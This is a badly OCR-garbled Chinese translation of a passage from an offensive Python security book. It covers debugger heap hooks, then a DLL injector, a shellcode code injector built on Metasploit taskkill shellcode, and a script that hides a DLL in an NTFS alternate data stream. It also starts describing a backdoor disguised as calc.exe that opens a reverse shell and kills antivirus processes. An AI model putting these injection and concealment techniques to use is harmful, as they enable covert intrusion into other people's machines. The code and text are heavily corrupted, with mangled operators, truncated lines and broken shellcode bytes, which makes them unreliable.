RRAK, KAARE 转 代 码 履 盖 的 代码 就 存放 在 这 块 新 创建 的 区 域 。 当 你 构造 
fast log hooks 的 时 候 ， 需 要 先 定 一 个 hook 指针 ， 然 后 定义 想 要 记录 的 数据 指 

针 。 程 序 框架 如 下 : 


imm = immlib.Debugger() 

fast - immlib.FastLogHook( imm ) 
fast.logFunction( address, num arguments ) 
fast.logRegister( register ) 
fast.logDirectMemory( address ) 
fast.logBaseDisplacement( register, offset ) 


logFunction 接受 两 个 参数 ，address 就 是 在 希望 hook 的 函数 内 部 的 某 个 地 址 (这 
个 地 址 会 被 跳 转 指令 覆盖 ) 。 如 果 在 函数 的 头 部 hook，num_arguments 则 设置 成 
想 要 捕捉 到 的 参数 的 数量 ， 如 果 在 画 数 的 结束 hook， 则 设置 成 0。 数 
据 的 记录 FA logRegister(),logBaseDisplacement(), and logDirectMemory() 三 个 
方法 完成 。 


logRegister( register ) 
logBaseDisplacement( register, offset ) logDirectMemory( address ) 


SS eZee eee 


logRegister() 方 法 用 于 跟踪 指定 的 寄存 器 ， 上 比如 跟踪 函数 的 返回 值 (存储 在 EAX 

) o logBaseDisplacement() 方 法 接收 2 个 参数 ， 一 个 寄存 器 ， 和 一 个 偏 移 量 ; 
用 于 从 栈 中 提取 参数 或 者 根据 寄存 器 和 偏 移 量 获 取 。 最 后 一 个 logDirectMemory() 
用 于 从 指定 的 内 存 地 址 获取 数据 。 


当 hook fig, log 辑 数 执行 之 后 ， 他 们 就 将 数据 存储 在 一 个 FastLogHook 申请 的 
地 址 。 为 了 检索 hook 的 结果 ， 你 必须 使 用 getAllLog() 函 数 ， 它 会 返回 一 个 
Python 列表 : 


[( hook address, ( argi, arg2, argN )), ... ] 


所 以 每 次 hook 被 触发 的 时 候 ， 触 发 地 址 就 存在 hook address 里 ， 所 有 需要 的 信 
息 包 含 在 第 二 项 中 。 还 有 另外 一 个 重要 的 FastLogHook 就 是 
STDCALLFastLogHook( 用 F STDCALL 调用 约定 )。cdecl 调用 约定 使 用 
FastLogHook, 


Nicolas Waisman( 顶 级 堆 浴 出 专家 ) 开 发 了 hippie( 利 用 hard hook)， 可 以 在 
Immunity 中 通 过 PyCommand 进行 调用 。Nico 的 解说 : 


创造 Hippie 的 目的 是 为 了 创建 一 个 好 笑 的 log hook， 使 得 处 理 海量 的 堆 范 数 调用 
变 成 可 能 。 举 个 例子 : 如 果 你 用 Notepad 打开 一 个 文件 对 话 框 ， 它 需要 调用 
X # 4500 次 RtlAllocateHeap 和 RtlFreeHeap 。 如 果 是 Internet Explorer, HE 
相关 的 函数 调用 会 有 10 倍 甚至 更 多 。 


通过 hippie 学 习 堆 的 操作 ， 对 于 将 来 写 基 于 堆 利 用 的 exploit 相当 重要 。 出 于 简洁 
Wim 因 ， 我 们 只 使 用 hippie 的 核心 功能 创建 一 个 简单 的 脚本 hippie_easy.py。 


在 我 们 开始 前 ， 先 了 解 下 RtlAllocateHeap 和 RtlFreeHeap。 


BOOLEAN RtlFreeHeap( 
IN PVOID HeapHandle, IN ULONG Flags, 
IN PVOID HeapBase 


); 

PVOID RtlAllocateHeap( 
IN PVOID HeapHandle, IN ULONG Flags, 
IN SIZE T Size 


): 


RtlFreeHeap 和 RtlAllocateHeap 的 所 有 参数 都 是 必须 捕捉 的 ， 不 过 
RtlAllocateHeap 返回 的 新 堆 的 地 址 也 是 需要 捕捉 的 。 


#hippie_easy.py 
import immlib 
import immutils 
# This is Nico's function that looks for the correct 
# basic block that has our desired ret instruction 
# this is used to find the proper hook point for RtlAllocateHeap 
def getRet(imm, allocaddr, max_opcodes = 300): 
addr = allocaddr 
for a in range(0, max opcodes): 
op - imm.disasmForward( addr ) 
if op.isRet(): 
if op.getImmConst() == OxC: 
op - imm.disasmBackward( addr, 3 ) 
return op.getAddress() 
addr = op.getAddress() 
return 0x0 
4 A simple wrapper to just print out the hook 
# results in a friendly manner, it simply checks the hook 
# address against the stored addresses for RtlAllocateHeap, RtlFree 
if a[0] == rtlallocate: 


imm.Log( "RtlAllocateHeap(0x9608x, 0x9608x, 0x9608x) <- Ox%O8x %s' 
return "done" 
else: 
imm.Log( "RtlFreeHeap(0x%08x, 0x%08x, Ox%O08x)" % (a[1][0], a[1. 
def main(args): 
imm = immlib.Debugger() 


Name - "hippie" 
fast = imm.getKnowledge( Name ) 
if fast: 


# We have previously set hooks, so we must want 

# to print the results 

hook list - fast.getAllLog() 

rtlallocate, rtlfree = imm.getKnowledge("FuncNames" ) 

for a in hook_list: 

ret = showresult( imm, a, rtlallocate ) 

return "Logged: %d hook hits." % len(hook_list) 
# We want to stop the debugger before monkeying around 
imm.Pause() 
rtlfree - imm.getAddress("ntdll.RtlFreeHeap") 
rtlallocate - imm.getAddress("ntdll.RtlAllocateHeap") 
module - imm.getModule("ntdll.dll") 
if not module.isAnalysed(): 

imm.analyseCode( module.getCodebase() ) 
# We search for the correct function exit point 
rtlallocate - getRet( imm, rtlallocate, 1000 ) 
imm.Log("RtlAllocateHeap hook: 0x9608x" % rtlallocate) 
# Store the hook points 
imm.addKnowledge( "FuncNames", ( rtlallocate, rtlfree ) ) 
# Now we start building the hook 
fast - immlib.STDCALLFastLogHook( imm ) 
4 We are trapping RtlAllocateHeap at the end of the function 
imm.Log("Logging on Alloc 0x9608x" % rtlallocate) 
fast.logFunction( rtlallocate ) 
fast.logBaseDisplacement( "EBP", 8 ) 
fast.logBaseDisplacement( "EBP", OxC ) 
fast.logBaseDisplacement( "EBP", 0x10 ) 
fast.logRegister( "EAX" ) 
4 We are trapping RtlFreeHeap at the head of the function 
imm.Log("Logging on RtlFreeHeap 0x%08x" % rtlfree) 
fast.logFunction( rtlfree, 3 ) 
# Set the hook fast.Hook() 
# Store the hook object so we can retrieve results later 
imm.addKnowledge(Name, fast, force add - 1) 
return "Hooks set, press F9 to continue the process." 


E 


第 一 个 画 数 使 用 Nico 内 建 的 代码 块 找到 可 以 在 RtlAllocateHeap 内 部 设置 hook 的 
地 址 。 让 我 们 反 汇 编 RtlAllocateHeap 本 数 看 看 最 后 几 行 的 指令 是 怎么 样 的 : 





0x7C9106D7 F605 F002FE7F TEST BYTE PTR DS:[7FFE02F0],2 
0x7C9106DE OF85 1FB20200 JNZ ntdll.7C93B903 

0x7C9106E4 8BC6 MOV EAX,ESI 

0x7C9106E6 E8 17E7FFFF CALL ntdll.7C90EE02 

0x7C9106EB C2 OCOO RETN OC 


Python 代码 从 函数 的 头 部 看 似 反 汇编 ， 直 到 在 Ox7C9106EB 找到 RET 指令 然后 确 
认 整 行 指 使 包含 0x0C。 然 后 往 后 反 汇编 3 行 指令 到 达 0x7C9106D7。 这 样 做 只 不 
过 是 为 了 确保 有 足够 的 空间 写 入 5 个 字 节 的 UMP 指令 。 如 果 我 们 在 RET 这 行 写 
入 5 个 字 节 的 IMPS, 数据 就 会 覆盖 出 函数 的 代码 范围 。 那 接 下 来 很 可 能 发 生 
恐怖 的 事情 ， 破 坏 了 代码 对 齐 ， 进 程 会 月 溃 。 这 些小 函数 能 帮 你 解决 很 多 可 怕 的 事 
情 ， 在 二 进 制 面前 ， 任 何 的 差错 都 会 导致 灾难 。 


下 一 行 代 码 就 是 简单 的 判断 hook 是 否 设置 了 ， 如 果 设 置 了 就 从 knowledge base 
中 获取 必要 的 目标 ， 然 后 打印 出 hook 信息 。 脚 本 第 一 次 运行 的 时 候 设 置 hook， 
第 二 次 运行 的 时 候 监视 hook 到 的 结果 ， 每 次 运行 都 获取 新 的 hook 数据 。 如 果 想 
查询 任何 存储 在 knowledge base 里 的 目标 ， 重 要 从 调试 器 的 shell 里 访问 就 行 了 。 


最 后 一 块 代码 就 是 构造 hook 和 监视 点 。 对 于 RtlAllocateHeap 调用 获取 所 有 的 三 
个 参数 还 有 返回 值 ，RtlFreeHeap 只 要 获取 三 个 参数 就 可 以 了 。 只 用 了 不 超过 100 
行 的 代码 ， 我 们 就 成 功 使 用 了 强大 的 hard hook， 没 用 使 用 任何 的 编辑 器 和 多 余 的 
工具 。Very cool! 


让 用 notepad.exe 做 测试 ， 看 看 是 否 如 Nico 所 说 打开 一 个 对 话 框 就 会 有 将 近 4500 
SHE 调用 。 在 Immunity 下 打开 CAWINDOWS|System32Wotepad.exe i 
filhippie easy 命令 (如 果 TEA 第 五 章 )。 恢 复 进 程 ， 在 Notepad 里 选择 File-- 
>Open。 


现在 确认 结果 。 重 复 运行 lhippie_easy， 你 将 会 看 到 调试 器 日 志 窗 口 (ALT-L) 的 输 
出 。 


RtlFreeHeap(0x000a0000, 0x00000000, 0x000ca0b0) 
RtlFreeHeap(0x000a0000, 0x00000000, 0x000ca058) 
RtlFreeHeap(0x000a0000, 0x00000000, 0x000ca020) 
RtlFreeHeap(0x001a0000, 0x00000000, 0x001a3ae8) 
RtlFreeHeap(0x00030000, 0x00000000, 0x00037798) 
RtlFreeHeap(0x000a0000, 0x00000000, O0x000c9fe8) 


Listing 6-2 FA!hippie easy PyCommand 产生 的 输出 


非常 好 ! 我 们 有 了 一 些 结 果 ， 如 果 你 看 到 Immunity 调试 器 的 状态 栏 ， 会 看 到 总 共 
有 4674 次 触发 。 所 以 Nico 是 对 的 。 你 能 在 任何 时 候 重新 运行 脚本 以 便 看 到 新 的 触 
发 结果 和 统计 数值。 最 cool 的 地 方 是 成 千 上 万 次 的 调用 都 不 会 降低 到 进程 的 执行 
效率 。 


hook 将 会 在 你 的 逆向 调试 中 一 次 又 一 次 的 使 用 。 在 这 里 我 们 不 仅 学 会 了 运用 强大 的 
hook 技能 ， 还 让 这 一 切 自动 的 进行 ， 这 是 美好 的 ， 这 是 幸福 的 ， 这 是 伟大 的 。 接 
下 来 让 我 们 学 习 如 何 控制 一 个 进程 ， 那 会 更 有 趣 。 
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7 DII 和 代码 注入 


有 时 候 在 执行 逆向 工程 或 者 攻击 特定 程序 的 时 候 ， 将 代码 加 载 进 目标 进程 ， 并 在 进 
程 内 执行 是 非常 有 用 的 。 这 类 技术 一 般 被 称 为 注入 ， 常 用 于 偷 取 密 码 或 者 获得 远程 
桌面 的 控制 权 。 注 入 主要 分 为 DLL 和 代码 注入 两 种 ， 我 们 将 用 Python 结合 这 两 种 
技术 创建 一 些 简单 的 应 用 程序 。 为 将 来 开发 ，exploit 编写 ，shellcode 和 安全 测试 
做 准 各 。 接 下 来 要 实现 的 任务 就 是 ， 用 DLL 注入 在 目标 进程 内 运行 一 个 窗口 ， 用 代 
码 注入 将 shellcode 注入 目标 进程 ， 让 shellcode 杀 死 进程 。 最 后 我 们 将 用 纯 
Python 实现 一 个 后 门 。 在 实现 的 过 程 中 将 大 量 的 用 到 代码 注入 ， 和 一 些 黑色 技巧 。 
让 我 们 先 从 创建 远 线程 开始 ， 这 是 注入 的 基础 。 


7.1 创建 远 线程 


两 种 注入 虽然 在 基础 原理 上 不 同 ， 但 是 实现 的 方法 差不多 : 创建 远 线程 。 这 由 
CreateRemoteThread() 完 成 ， 同 样 由 由 kernel32.dll 导出 。 原 型 如 下 : 


HANDLE WINAPI CreateRemoteThread( 
HANDLE hProcess, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
SIZE T dwStackSize, 
LPTHREAD START ROUTINE lpStartAddress, 
LPVOID lpParameter, 
DWORD dwCreationFlags, 
LPDWORD lpThreadId 

); 


别 被 这 人 么 多 参数 吓 着 ， 它 们 很 多 通过 名 字 就 能 知道 什么 用 。 第 一 个 参数 ，hProcess 
就 是 将 要 注入 的 目标 进程 的 句柄 。IpThreadAttributes 参数 就 是 创建 的 线程 的 安全 
描述 符 ， 其 中 的 数值 决定 了 线程 是 否 能 被 子 进程 继承 。 在 这 里 只 要 简单 的 设置 成 
NULL， 将 会 得 到 一 个 不 能 继承 的 线程 句柄 ， 和 一 个 默认 的 安全 描述 符 。 
dwStackSize 参数 表示 新 线程 的 栈 大 小 ， 在 这 里 简单 的 设置 成 0， 表 示 设 置 成 进程 
默认 的 大 小 。 下 一 次 参数 是 最 重要 的 : lpStartAddress， 也 就 是 新 线程 要 执行 的 代 
码 在 内 存 中 的 哪个 位 置 。lpParameter 和 上 一 个 参数 一 样 重要 , 不 过 提供 的 是 一 
个 指针 ， 指 向 一 块 内 存 区 域 ， 里 头 的 数据 就 是 传递 给 新 线程 的 参 
数 。 dwCreationFlags 决定 了 线程 如 何 开 始 。 这 里 我 们 设置 成 0， 表 示 在 线程 创建 
后 立即 执行 。 更 多 详细 的 介绍 看 MSDN。 最 后 一 个 参数 IpThreadld 在 线程 创建 成 
功 后 填充 为 新 线程 的 ID。 知道 了 参数 的 作用 ， 让 我 们 看 看 如 何 将 DLL 注入 到 目标 
进程 ， 以 及 shellcode 的 注入 。 


两 种 远 线程 创建 ， 有 些许 的 不 同 ， 所 以 分 开 来 说 。 
7.1.1 DLL 注入 


DLL 注入 是 亦 正 亦 那 的 技术 。 从 Windows 的 shell 扩展 到 病毒 的 偷 取 技术 ， 处 处 都 
能 见 到 它们 。 甚 至 安全 软件 也 会 通过 将 DLL 注入 进程 以 监视 进程 的 行为 。DLL 确 
实 很 好 用 ， 因 为 它们 不 仅 能 够 将 它 编 译 为 二 进 制 ， 还 能 加 载 到 目标 进程 ， 使 它 成 为 
目标 进程 的 一 部 分 。 这 非常 有 用 ， 上 比如 绕 过 软件 防火 墙 的 限制 (它们 通常 只 让 特定 
的 进程 与 外 界 联系 ， 比 如 E) 。 接 下 来 让 我 们 用 Python 写 一 个 DLL 注入 脚本 ， 
实现 将 DLL 注入 指定 的 任何 进程 。 


在 一 个 进程 里 载 入 DLL 需要 使 用 LoadLibrary()ESZ& (由 kernel32.dll 导出 ) . WAX 
原型 如 下 : 


HMODULE LoadLibrary( 
LPCTSTR lpFileName 
): 


IpFileName 参数 为 DLL 的 路 径 。 我 们 需要 让 目标 调用 LoadLibraryA 加 载 我 们 的 
DLL. 首先 解析 出 LoadLibraryA 在 内 存 中 的 地 址 ， 然 后 将 DLL 路 径 传 入 。 实 际 操 
作 就 是 使 用 CreateRemoteThread(), IpStartAddress 指向 LoadLibraryA 的 地 址 ， 
IpParameter 指向 DLL 路 径 。 当 CreateRemoteThread() 执 行 成 功 ， 就 像 目 标 进程 
自己 调用 LoadLibraryA 加 载 了 我 们 的 DLL。 


DLL 注入 测试 的 源码 ， 可 从 http:/www.nostarch.com/ghpython.htm 下 载 。 


#d11_injector.py 
import sys 
from ctypes import * 
PAGE_READWRITE = 0x04 
PROCESS ALL ACCESS = ( 0x000F0000 | 0x00100000 | OXFFF ) 
VIRTUAL MEM = ( 0x1000 | 0x2000 ) 
kernel32 - windll.kernel32 
pid - sys.argv[1] 
dll path - sys.argv[2] 
dll len - len(dll path) 
4 Get a handle to the process we are injecting into. 
h process - kernel32.0penProcess( PROCESS ALL ACCESS, False, int(p: 
if not h process: 
print "[*] Couldn't acquire a handle to PID: %s" % pid 
sys.exit(0) 
# Allocate some space for the DLL path 
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTU/ 
# Write the DLL path into the allocated space 
written = c_int(0) 
kernel32.WriteProcessMemory(h_process, arg address, dll path, dll: 
4 We need to resolve the address for LoadLibraryA 
h kernel32 = kernel32.GetModuleHandleA("kernel32.dll") 
h loadlib = kernel32.GetProcAddress(h kernel32,"LoadLibraryA") 
# Now we try to create the remote thread, with the entry point set 
# to LoadLibraryA and a pointer to the DLL path as its single parar 
if not kernel32.CreateRemoteThread(h process, 
None, O0, 
h loadlib, arg address, 0, 
byref(thread id)): 
print "[*] Failed to inject the DLL. Exiting." 
sys.exit(0) 
print "[*] Remote thread with ID 0x%08x created." % thread id.valu« 


E = : 


第 一 步 ， 在 目标 进程 内 申请 足够 的 空间 ， 用 于 存储 DLL 的 路 径 。 第 二 步 ， 将 DLL 
路 径 宇 入 申请 好 的 地 址 。 第 三 步 ， 解 析 LoadLibraryA 的 内 存 地 址 。 最 后 一 步 ， 将 
目标 进程 句柄 和 LoadLibraryA 地 址 还 有 存储 DLL 路 径 的 内 存 地 址 ， 传 人 
CreateRemoteThread() — E, 线程 创建 成 功 就 会 看 到 弹出 一 个 窗口 。 


现在 我 们 已 经 成 功 的 完成 了 DLL 注入 。 是 让 弹出 窗口 优点 虎 头 蛇 尾 。 但 是 这 对 于 我 
们 明白 注入 的 使 用 ， 非 常 重要 。 





7.1.2 代码 注入 


让 我 们 再 狭 独 点 ， 再 黑 点 。 代 码 注 入 能 够 将 shellcode 注入 到 一 个 运行 的 进程 ， 立 
即 执 行 ， 不 会 在 硬盘 上 留 下 任何 东西 。 同 样 也 能 将 一 个 进程 的 shell 迁移 到 另 一 个 
进程 。 


接 下 来 我 们 将 用 一 个 简短 的 shellcode (能 终止 指定 PID 的 进程 ) 注入 到 目标 进 
E, A 后 杀 掉 目标 进程 ， 同 时 不 留任 何 痕迹 。 这 对 于 我 们 本 章 最 后 要 创建 的 后 门 是 
至 关 重 要 的 一 步 。 同样 ， 我 们 还 要 演示 如 何 安全 的 替换 shellcode， 以 适用 更 多 的 
不 同 的 任务 。 


可 以 通过 Metasploit 的 主页 获得 终止 进程 的 shellcode， 它 们 的 shellcode 生成 器 非 
常 好 用 。 如 果 之 前 没 用 过 的 ， 直 接 访问 http://metasploit.com/shellcode/。 这 次 我 
们 使 用 Windows Execute Command shellcode 生成 器 。 创 建 的 shellcdoe 如 表 7- 
1。 


/* win32 exec - EXITFUNC-thread CMD-taskkill /PID AAAAAAAA Size-15: 

unsigned char scode[] - 
"NXfCNXe8Nx44NX00NX00NX090NX8bNXx45NX3C NX8DNX7CNX05NX78Nx0d1Nxef Vo 
"\X4F\xX18\x8b\x5F\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xcO\> 
"\xac\x84\xcO\x74\x07\xc1\xca\xOd\xO01\xc2\xeb\xf4\x3b\x54\x24\) 
"\xX75\xe5\x8b\x5F\x24\x01\xeb\x66\x8b\xO0c\x4b\x8b\x5F\x1c\x01\> 
"\x8b\xic\x8b\x01\xeb\x89\x5C\x24\x04\xc3\x31\xcO\x64\x8b\x40\> 
"\xX85\xcO\x78\x0C\x8b\x40\xOc\x8b\x70\x1c\xad\x8b\x68\x08\xeb\> 
"\x8b\x8O0\xbO\xOO\xXOO\XOO\X8D\X68\X3C\X5F\X31\x F6\X60\x56\x89\) 
"\X83\xcO\x7b\x50\x68\xef\xce\xeO\x60\x68\x98\xfe\x8a\x0e\x57\) 
"\xe7\x74\x61\X73\xX6D\xX6D\X69\X6C\X6C\X2Z0\X2F\X50\X49\x44\x20\) 
"\X41\X41\xX41\xX41\xX41\xX41\xX41\ x00"; 


SSS SS SSS SSS Swear 
Listing 7-1: 由 Metasploit 产生 的 Process-killing shellcode 


生成 的 shellcode 的 时 候 记 得 选中 Restricted Characters 文本 框 以 清除 0x00 = 
节 ， 同 时 Encoder 框 设 置 成 默认 编码 。 在 shellcode 的 最 后 一 行 你 看 到 了 重复 的 8 
个 \X41。 为 什么 是 8 个 大 小 的 A? 因 为 ， 后 面 我 们 要 动态 的 指定 PID( 需 要 被 杀 掉 的 
进程 ) 的 时 候 ， 只 要 把 8 个 \x41 替换 成 PID 的 数值 就 行 了 ， 剩 下 的 位 置 用 \x00 蔡 
换 。 如 果 之 前 生成 的 时 候 对 shellcode 进行 了 编码 ， 那 后 面 的 这 8 个 A 也 会 被 编 
码 ， 到 时 候 你 就 会 非常 痛苦 ， 根 本 找 不 出 来 奉 换 的 地 方 。 


现在 我 们 有 了 自己 的 shellcode， 是 时 候 回 来 进行 实际 的 code injection 工作 了 。 





Zcode injector.py 

import sys 

from ctypes import * 

# We set the EXECUTE access mask so that our shellcode will 

# execute in the memory block we have allocated 

PAGE EXECUTE READWRITE = 0x00000040 

PROCESS ALL ACCESS = ( Ox000F0000 | 0x00100000 | OxFFF ) 

VIRTUAL MEM = ( 0x1000 | 0x2000 ) 

kernel32 = windll.kernel32 

pid - int(sys.argv[1]) 

pid to kill - sys.argv[2] 

if not sys.argv[1] or not sys.argv[2]: 
print "Code Injector: ./code injector.py <PID to inject» <PID 1 

#/* win32 exec - EXITFUNC-thread CMD-cmd.exe /c taskkill /PID AAAA 

4Size-159 Encoder=None http://metasploit.com */ 

shellcode = \ 
"\xXFfc\xe8\x44\x00\x00\x00\x8b\x45\x3C\x8b\x7C\x05\x78\x01\xef\) 
"\X4F\x18\x8b\x5F\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xcO\) 
"\xac\x84\xcO\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\) 
"\xX75\xe5\x8b\x5F\x24\x01\xeb\x66\x8b\xO0c\x4b\x8b\x5F\x1c\x01\) 
"\xX8b\x1ic\x8b\x01\xeb\x89\x5C\x24\x04\xc3\x31\xcO\x64\x8b\x40\) 
"\X85\xcO\x78\x0C\x8b\x40\x0C\x8b\x70\x1c\xad\x8b\x68\x08\xeb\> 
"\xX8b\x8O0\xbO\xOO\xO0O\xO0O\x8b\x68\x3C\xX5F\xX31\xf6\x60\x56\x89\) 
"\xX83\xcO\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\) 
"\xe7\xX63\x6d\x64\x2e\xX65\xX78\xX65\xX20\X2F\xX63\X20\X74\xX61\X73\) 
"NX6bNX69NX6CcNX6CNX20NX2f NXBONX49NX44NX20NXA1NXA1NXA1NX41NX00" 

padding - 4 - (len( pid to kill )) 

replace value = pid to kill + ( "\x00" * padding ) 

replace string- "x41" * 4 

shellcode - shellcode.replace( replace string, replace value ) 

code size - len(shellcode) 

4 Get a handle to the process we are injecting into. 

h process - kernel32.0penProcess( PROCESS ALL ACCESS, False, int(p: 

if not h process: 
print "[*] Couldn't acquire a handle to PID: %s" 96 pid 
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# code injector.py 

import sys 

from ctypes import * 

4 We set the EXECUTE access mask so that our shellcode will 

# execute in the memory block we have allocated 

PAGE EXECUTE READWRITE - 0x00000040 

PROCESS ALL ACCESS = ( 0x000F0000 | 0x00100000 | OXFFF ) 

VIRTUAL MEM = ( 0x1000 | 0x2000 ) 

kernel32 = windll.kernel32 

pid - int(sys.argv[1]) 

pid to kill - sys.argv[2] 

if not sys.argv[1] or not sys.argv[2]: 
print "Code Injector: ./code injector.py <PID to inject» <PID 1 
sys.exit(0) 

#/* win32 exec - EXITFUNC-thread CMD-cmd.exe /c taskkill /PID AAAA 

4Size-159 Encoder=None http://metasploit.com */ 

shellcode = \ 
"NXfCNXe8NX44NX00NX00NX00NX8bNXABNX3CNX8bNX7CNX05BNX78Nx01Nxef o 
"\X4F\x18\x8b\x5F\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xcO\) 
"\xac\x84\xcO\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\) 
"\xX75\xe5\x8D\x5F\xX24\x01\ xeb\x66\ x8b\xOc\x4b\x8b\x5F\x1c\x01\) 
"\x8b\x1ic\x8b\x01\xeb\x89\x5C\x24\x04\xc3\x31\xcO\x64\x8b\x40\) 
"\X85\xcO\x78\x0C\x8b\x40\x0C\x8b\x70\x1c\xad\x8b\x68\x08\xeb\) 
"\x8bD\x80\xbO\xO0O\xO0\xOO\x8D\x68\x3C\x5F\X31\xF6\xX60\x56\x89\) 
"\X83\xcO\x7b\x50\x68\xef\ xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\) 
"\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\) 
"NX6bNX69NX6CNX6CNX20NX2f NX5BONX49NX44NX20NXA1NXA1NXA1NX41NX00" 

padding - 4 - (len( pid to kill )) 

replace value = pid to kill + ( "\x00" * padding ) 

replace string- "\x41" * 4 

shellcode - shellcode.replace( replace string, replace value ) 

code size - len(shellcode) 

4 Get a handle to the process we are injecting into. 

h process - kernel32.0penProcess( PROCESS ALL ACCESS, False, int(p: 

if not h process: 
print "[*] Couldn't acquire a handle to PID: 95s" 96 pid 
sys.exit(0) 

# Allocate some space for the shellcode 

arg address = kernel32.VirtualAllocEx(h process, 0, code size, VIR 

# Write out the shellcode 

written = c int(0) 

kernel32.WriteProcessMemory(h process, arg address, shellcode, codt 

4 Now we create the remote thread and point its entry routine 

4 to be head of our shellcode 

thread id = c ulong(0) 

if not kernel32.CreateRemoteThread(h process, None, 0, arg address, Nor 
print "[*] Failed to inject process-killing shellcode. Exiting 
sys.exit(0) 

print "[*] Remote thread created with a thread ID of: 0x%08x" % thi 

print "[*] Process %s should not be running anymore!" % pid to kil. 
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上 面 的 代码 大 部 分 看 起 来 都 很 熟悉 ， 但 是 还 是 有 些 有 趣 的 技巧 的 。 第 一 个 ， 蔡 换 
shellcode 成 我 们 想 终 止 的 PID 的 字符 串 。 另 一 个 值得 关注 的 地 方 ， 就 是 调用 
CreateRemoteThread()&t, IpStartAddress 指向 存放 shellcode 的 地 址 ， 而 
IpParameter 设置 为 NULL。 因 为 我 们 不 需要 传 人 任何 参数 ， 我 们 只 是 想 创建 新 线 
程 执 行 shellcdoe。 


脚本 调用 参数 如 下 : 


./code injector.py <PID to inject» <PID to kill» 


传 入 合适 的 参数 ， 线 程 创建 成 功 的 话 ， 就 会 返回 线程 ID。 目标 进程 被 终止 后 ， 你 会 
看 到 cmd.exe 进程 也 结束 了 。 


现在 你 知道 了 如 何 从 另 一 个 进程 加 载 和 执行 shellcdoe。 现 在 不 仅 迁 移 shell 方便 
f, RA 藏 踪迹 也 更 方便 了 ， 因 为 没有 任何 代码 出 现在 硬盘 上 。 接 下 来 把 我 们 所 学 的 
结合 起 来 ， 创 建 一 个 可 定制 的 后 门 ， 当 目标 机 器 上 线 的 时 候 ， 就 能 获取 远程 访问 的 
权限 。 


我 们 能 更 坏 吗 ?能 | 


7.2 BENS 


现在 让 我 们 本 着 学 以 致 用 的 目的 ， 用 注入 搞 点 好 玩 的 东西 。 我 们 将 创造 一 个 后 门 程 
序 ， 将 它 命名 为 一 个 系统 中 正规 的 程序 (比如 calc.exe) 。 只 要 用 户 执行 了 
calc.exe， 我 们 的 后 门 


就 能 获得 系统 的 控制 权 。cacl.exe 执行 后 ， 就 会 在 执行 后 门 代 码 的 同时 ， 执 行 原先 
的 calc.exe (之 前 我 们 的 后 门 命 名 成 calc.exe， 将 原来 的 cacl.exe 移 到 别 的 地 
方 ) 。 当 cacl.exe 执行 后 ， 通过 注入 ， 反 弹 一 个 shell 到 我 们 的 机 器 上 ， 最 后 我 们 
再 注入 kill 代码 ， 杀 死 前 面 运 行 的 程 Fo 


等 一 等 | 我 们 难道 不 能 直接 结束 calc.exe 吗 ? 简单 地 说 ， 可 以 。 但 是 终止 进程 对 于 
后 门 来 说 是 一 项 很 关键 的 技术 。 上 比如 ， 你 能 通过 枚 举 进 程 ， 找 出 杀毒 软件 和 防火 墙 
的 的 进程 ， 然 后 简单 的 杀 死 。 或 者 你 也 能 ， 通 过 上 一 章 学 到 的 注入 技术 ， 在 离开 前 
杀 死 进程 。 技 术 不 止 一 种 ， 选 择 合 适 的 是 最 重要 的 。 


最 后 我 们 还 会 介绍 如 何 将 Python 脚本 编译 成 一 个 单独 的 Windows 可 执行 文件 ， 以 
及 如 何 偷偷 的 加 载 DLL。 接 下 来 先 看 看 如 何 将 DLL 隐藏 起 来 。 


7.2.1 文件 隐藏 


我 们 的 后 门 会 做 成 DLL 的 形式 ， 为 了 能 够 它 安 全 点 ， 得 用 一 些 秘密 的 方法 将 它 藏 起 
来 。 我 们 能 够 用 捆绑 器 ， 将 两 个 文件 〈 其 中 包括 我 们 的 DLL) 捆绑 起 来 ， 不 过 WE 
ARE Python Hacer, 当然 得 有 点 不 一 样 了 。 

OS 就 是 我 们 最 好 的 老病 ，NTFS 同样 提供 了 很 多 强大 而 隐秘 的 技巧 ， 今 天 我 们 就 
FB alternate data streams (ADS), M Windows NT 3.1 开始 就 有 了 这 项 技术 ， 目 的 
EA SAAR 的 系统 Apple heirarchical file system (HFS) 进 行 通讯 。ADS 人 允许 硬 
盘 上 的 一 个 文件 ， 能 够 将 DLL 储存 在 它 的 流 中 ， 然 后 附加 到 主 进程 执行 。 流 就 是 
隐藏 的 文件 ， 但 是 能 够 被 附加 到 任 何在 硬盘 上 能 看 得 到 的 文件 。 

使 用 流 隐 藏 的 文件 ， 不 用 特殊 的 工具 是 看 不 见 的 。 目 前 很 多 安全 工具 也 还 不 能 很 好 
的 扫 描 ADS， 所 以 用 此 逃避 追捕 是 非常 理想 的 。 


在 一 个 文件 上 使 用 ADS， 很 简单 ， 只 要 在 文件 名 后 附加 双 引 号 ， 接 着 跟 上 我 们 想 隐 
藏 的 文 


o 


reverser.exe:vncdll.dll 


在 这 个 例子 中 我 们 将 vncdll. dl 附加 到 reverserexe 中 。 下 面 写 个 简单 
的 脚本 file_hider.py， 就 当 的 读 取 文件 然后 写 入 指定 文件 的 ADS, 


4file hider.py import sys 

# Read in the DLL 

fd = open( sys.argv[1], "rb" ) 

dll contents - fd.read() 

fd.close() 

print "[*] Filesize: %d" % len( dll contents ) 

4 Now write it out to the ADS 

fd = open( "%s:%s" % ( sys.argv[2], sys.argv[1] ), "wb" ) 
fd.write( dll contents ) 

fd.close() 


Raž, BN ABUS UE ie DLL, 986—530 EHE. AR 
个 工具 我 们 就 能 够 很 方便 的 ， 通 过 写 入 流 的 方式 ， 将 我 们 的 文件 和 目标 文件 结合 在 
一 起 。 


7.2.2 编写 后 门 


让 我 们 构建 我 们 的 重 定向 代码 ， 只 要 简单 的 启动 指定 名 字 的 程序 就 行 了 。 之 所 以 叫 
执行 重 定向 ， 是 因为 我 们 将 后 门 的 名 字 命名 为 calc.exe 了 还 将 原来 的 calc.exe f£ 
MENT 别 的 地 方 。 当 用 户 测 试 执行 计算 器 的 时 候 ， 就 会 不 经 意 的 执行 了 我 们 的 后 
